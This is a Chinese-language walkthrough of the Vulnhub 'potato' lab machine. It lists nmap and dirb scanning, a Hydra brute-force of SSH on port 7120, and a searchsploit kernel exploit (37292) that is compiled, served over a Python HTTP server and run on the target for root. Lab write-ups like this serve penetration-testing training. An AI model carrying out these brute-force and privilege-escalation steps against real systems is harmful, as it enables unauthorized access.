Vulnhub---potato

目录

      • Vulnhub---potato
      • 信息收集
        • 扫描目标网段
        • 扫描端口
        • 访问网站
        • 扫描网站目录
        • 发现漏洞
      • ssh利用
        • Hydra破解ssh
        • 登陆
        • 查看内核版本
        • 开启http服务

Vulnhub—potato

靶机下载地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/

信息收集

扫描目标网段
nmap -sP 172.16.58.0/24

Vulnhub---potato_第1张图片

扫描端口
nmap -sS -sV -p- -v 172.16.58.130

Vulnhub---potato_第2张图片

访问网站

172.16.58.130
Vulnhub---potato_第3张图片

扫描网站目录
dirb http://172.16.58.130

Vulnhub---potato_第4张图片

发现漏洞

访问扫描出来的网址

http://192.168.232.188/info.php

Vulnhub---potato_第5张图片
这条路行不通,重新分析7120端口,利用ssh服务破解

ssh利用

Hydra破解ssh
hydra -l potato -P top1000.txt -vV ssh://172.16.58.130:7120

在这里插入图片描述
Vulnhub---potato_第6张图片

登陆

使用破解出来的账号密码进行登录

ssh [email protected] -p 7120

Vulnhub---potato_第7张图片

查看内核版本
uname -a

在这里插入图片描述
另起一个终端

searchsploit ubuntu 3.13.0-24

Vulnhub---potato_第8张图片
进入到该目录下编译poc
Vulnhub---potato_第9张图片
编译完成后放在/var/www/html/目录下,进该目录查看一下。
在这里插入图片描述

开启http服务
python -m SimpleHTTPServer 8000

在这里插入图片描述
回到shell将编译好的文件下载到potato中
Vulnhub---potato_第10张图片
查看权限,赋予权限,执行文件,然后拿到权限

ls -l
chmod +x 37292
./37292

Vulnhub---potato_第11张图片

你可能感兴趣的:(渗透测试,web,安全,linux)